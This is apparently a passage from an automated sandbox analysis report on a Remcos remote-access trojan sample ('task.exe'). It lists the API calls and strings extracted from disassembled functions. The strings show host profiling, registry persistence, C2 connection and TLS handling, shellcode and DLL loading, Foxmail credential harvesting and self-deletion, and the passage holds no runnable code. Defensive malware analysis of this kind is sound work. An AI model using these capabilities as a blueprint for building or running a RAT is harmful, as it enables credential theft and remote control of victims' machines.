                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0006DB89), ref: 0007AE19
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE1C
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0006DB89), ref: 0007AE2D
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE30
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0006DB89), ref: 0007AE41
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE44
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0006DB89), ref: 0007AE55
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE58
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0006DB89), ref: 0007AE69
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE6C
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0006DB89), ref: 0007AE7D
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE80
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0006DB89), ref: 0007AE91
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE94
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0006DB89), ref: 0007AEA5
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AEA8
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0006DB89), ref: 0007AEB6
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AEB9
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\task.exe,00000104), ref: 0006DB96
                                                                                                                                                                  • Part of subcall function 0006FA5C: __EH_prolog.LIBCMT ref: 0006FA61
                                                                                                                                                                  • Part of subcall function 00071B45: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00071B54
                                                                                                                                                                  • Part of subcall function 00071B45: RegSetValueExA.KERNEL32(?,000C34D0,00000000,?,00000000,00000000,000D22B8,?,?,0006E3B0,000C34D0,4.9.4 Pro), ref: 00071B7C
                                                                                                                                                                  • Part of subcall function 00071B45: RegCloseKey.KERNEL32(?,?,?,0006E3B0,000C34D0,4.9.4 Pro), ref: 00071B87
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0007B6A8,00000000,00000000,00000000), ref: 0006DEA6
                                                                                                                                                                • StrToIntA.SHLWAPI(00000000,0000000F,00000000,0000002A,00000000,00000000,00000031,00000000,00000011,00000000,00000007,?,00000010,0000000B), ref: 0006DF73
                                                                                                                                                                • new.LIBCMT ref: 0006DF9B
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,000782A6,00000000,00000000,00000000), ref: 0006DFCC
                                                                                                                                                                • new.LIBCMT ref: 0006DFEE
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,000782A6,00000000,00000000,00000000), ref: 0006E01F
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                  • Part of subcall function 000718CF: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,000D2318,?,?,0006E19C,del), ref: 000718E6
                                                                                                                                                                  • Part of subcall function 000718CF: RegQueryValueExA.KERNEL32(?,0006E19C,00000000,00000000,00000000,00000000,?,?,0006E19C,del), ref: 000718FA
                                                                                                                                                                  • Part of subcall function 000718CF: RegCloseKey.KERNEL32(?,?,?,0006E19C,del), ref: 00071905
                                                                                                                                                                  • Part of subcall function 000719EB: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,000D2318), ref: 00071A11
                                                                                                                                                                  • Part of subcall function 000719EB: RegQueryValueExW.ADVAPI32(?,del,00000000,00000000,?,00000400), ref: 00071A32
                                                                                                                                                                  • Part of subcall function 000719EB: RegCloseKey.ADVAPI32(?), ref: 00071A3B
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00061C06,00000000,00000000,00000000), ref: 0006E092
                                                                                                                                                                • SetProcessDEPPolicy.KERNEL32(00000000,00000000,0000002B,00000023,00000016,00000014,00000000,?,00000010,0000000B), ref: 0006E10E
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000E304,00000000,00000000,00000000), ref: 0006E11A
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00070C44,00000000,00000000,00000000), ref: 0006E12F
                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0006E1E6
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0006E1F6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Module$Handle$CreateLibraryLoad$Thread$CloseValue$FileOpenQuery$DeleteH_prologLocalNamePolicyProcessSleepTime
                                                                                                                                                                • String ID: $#$Access Level: $Administrator$C:\Users\user\task.exe$DLL$Remcos Agent initialized$Rmc-RNN6CM$Shellcode$Shellcode$Software\$User$del$del$licence$license_code.txt
                                                                                                                                                                • API String ID: 503334946-918920343
                                                                                                                                                                • Opcode ID: ef2cf1c4546cbfd1921c18c74ee8c667ca92b08e3cb71abf733b6306c6b19165
                                                                                                                                                                • Instruction ID: 2557102da0a4939293b9e19bfca617caa35440a2c7cb155a67a487831954371a
                                                                                                                                                                • Opcode Fuzzy Hash: ef2cf1c4546cbfd1921c18c74ee8c667ca92b08e3cb71abf733b6306c6b19165
                                                                                                                                                                • Instruction Fuzzy Hash: 1CF19D70B443452BEB19B7748C67BEE26CB9F91704F08483DB5469B2D3DE698E04C3A2

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000000,00000029,000D22B8,000D2318,00000000), ref: 000732BB
                                                                                                                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 000734CC
                                                                                                                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00073E17
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                • String ID: | $$#$%I64u$4.9.4 Pro$C:\Users\user\task.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Rmc-RNN6CM$Shellcode$TLS Off$TLS On $h%$h%$h%$hlight$name
                                                                                                                                                                • API String ID: 524882891-944484879
                                                                                                                                                                • Opcode ID: bdea77a8492c9705c5a1b11bd5942313efcbb4c3eaecb23d035f86f5c5753a98
                                                                                                                                                                • Instruction ID: ac5f1362ccf34bb04cf0b50e1de3e0f65f04a24ade17415cc74a22cb391f7c2b
                                                                                                                                                                • Opcode Fuzzy Hash: bdea77a8492c9705c5a1b11bd5942313efcbb4c3eaecb23d035f86f5c5753a98
                                                                                                                                                                • Instruction Fuzzy Hash: 3D524C31A045195BEB19FB34EC63BEE737B9F60300F5081A9B40AA6193EE345F45CBA5

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • connect.WS2_32(FFFFFFFF,008572E8,00000010), ref: 00064A22
                                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00064B42
                                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00064B50
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 00064B63
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                • API String ID: 994465650-2151626615

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064F55
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064F64
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064F6D
                                                                                                                                                                • closesocket.WS2_32(000000FF), ref: 00064F7B
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064FB2
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000652DF), ref: 00064FC7
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00064FCE
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000652DF), ref: 00064FE3
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000652DF), ref: 00064FE8
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000652DF), ref: 00064FED
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064FFA
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064FFF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3658366068-0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00070F23
                                                                                                                                                                  • Part of subcall function 00079B58: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,000641A5), ref: 00079B7F
                                                                                                                                                                  • Part of subcall function 0007689B: CloseHandle.KERNEL32(0006421E,?,?,0006421E,000C2544), ref: 000768B1
                                                                                                                                                                  • Part of subcall function 0007689B: CloseHandle.KERNEL32(000C2544,?,?,0006421E,000C2544), ref: 000768BA
                                                                                                                                                                • Sleep.KERNEL32(0000000A,000C2544), ref: 00071056
                                                                                                                                                                • Sleep.KERNEL32(0000000A,000C2544), ref: 000710E8
                                                                                                                                                                • Sleep.KERNEL32(0000000A,000C2544), ref: 0007117A
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 000711D4
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00071207
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0007123E
                                                                                                                                                                • Sleep.KERNEL32(000001F4,000C2544,000C2544,000C2544), ref: 00071257
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00071295
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                • String ID: /stext "
                                                                                                                                                                • API String ID: 1223786279-3856184850

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0006CC91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LongNamePath
                                                                                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                • API String ID: 82841172-425784914

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6FE90A64
                                                                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6FE90A7E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2442719207-0

                                                                                                                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0007A124: GetCurrentProcess.KERNEL32(000D2318,?,?,000795B5,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0007A135
                                                                                                                                                                  • Part of subcall function 0007A124: IsWow64Process.KERNEL32(00000000,?,?,000795B5,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0007A13C
                                                                                                                                                                  • Part of subcall function 00071976: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,000D2318,00000000,Shellcode), ref: 0007199A
                                                                                                                                                                  • Part of subcall function 00071976: RegQueryValueExA.KERNEL32(000D2318,00000000,00000000,00000000,?,00000400), ref: 000719B7
                                                                                                                                                                  • Part of subcall function 00071976: RegCloseKey.KERNEL32(000D2318), ref: 000719C2
                                                                                                                                                                • StrToIntA.SHLWAPI(00000000,000C8964,00000000,00000000,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 00079620
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Shellcode
                                                                                                                                                                • API String ID: 782494840-2980324170

                                                                                                                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                APIs
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6FE90B0A
                                                                                                                                                                • dllmain_crt_dispatch.LIBCMT ref: 6FE90B21
                                                                                                                                                                • DllMain.G2M(?,00000001,00000000,?,00000001,00000000,?,00000001,00000000,6FEBB280,0000000C,00000007,6FEBB258,00000010,6FE90911,?), ref: 6FE90B38
                                                                                                                                                                • DllMain.G2M(?,00000000,00000000,?,00000001,00000000,?,00000001,00000000,6FEBB280,0000000C,00000007,6FEBB258,00000010,6FE90911,?), ref: 6FE90B50
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6FE90B69
                                                                                                                                                                • dllmain_crt_dispatch.LIBCMT ref: 6FE90B7C
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6FE90B8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: dllmain_raw$Maindllmain_crt_dispatch
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2381195575-0
                                                                                                                                                                APIs
                                                                                                                                                                • WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000081), ref: 6FE7CA4D
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6FE7CA65
                                                                                                                                                                • WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000001), ref: 6FE7CA83
                                                                                                                                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 6FE7CA95
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6FE7CAAC
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7CABD
                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 6FE7CACD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$Socket$HandleInformationclosesocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3114377017-0
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00120114,FFFFFFFF,?,?,00000000,00000000), ref: 6FE7C2E8
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7C306
                                                                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000006,00000000,00000008), ref: 6FE7C331
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7C352
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7C380
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6FE7C38D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1617036312-0
                                                                                                                                                                APIs
                                                                                                                                                                • CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE742AB
                                                                                                                                                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74311
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE7431E
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74327
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74338
                                                                                                                                                                • Sleep.KERNEL32(FFFFFFFF,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74399
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2261246915-0
                                                                                                                                                                • Opcode ID: 4fa1ef3d0a162ac68694ffae96f69b1ab90007deee41cf9005d591238e506298
                                                                                                                                                                • Instruction ID: 6bc646bb2dad9ab5c19cef2f12b864d35235fce069269c4a5ecbc1c59b3044c9
                                                                                                                                                                • Opcode Fuzzy Hash: 4fa1ef3d0a162ac68694ffae96f69b1ab90007deee41cf9005d591238e506298
                                                                                                                                                                • Instruction Fuzzy Hash: B131E331700304A7DB248E2D8CC5B9E3FA9AB8B724F65823AF92CDB3D0DA7498548751
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE693B0: GetSystemInfo.KERNEL32 ref: 6FE69479
                                                                                                                                                                • CreateFileMappingW.KERNEL32 ref: 6FE6990F
                                                                                                                                                                • MapViewOfFile.KERNEL32 ref: 6FE69A01
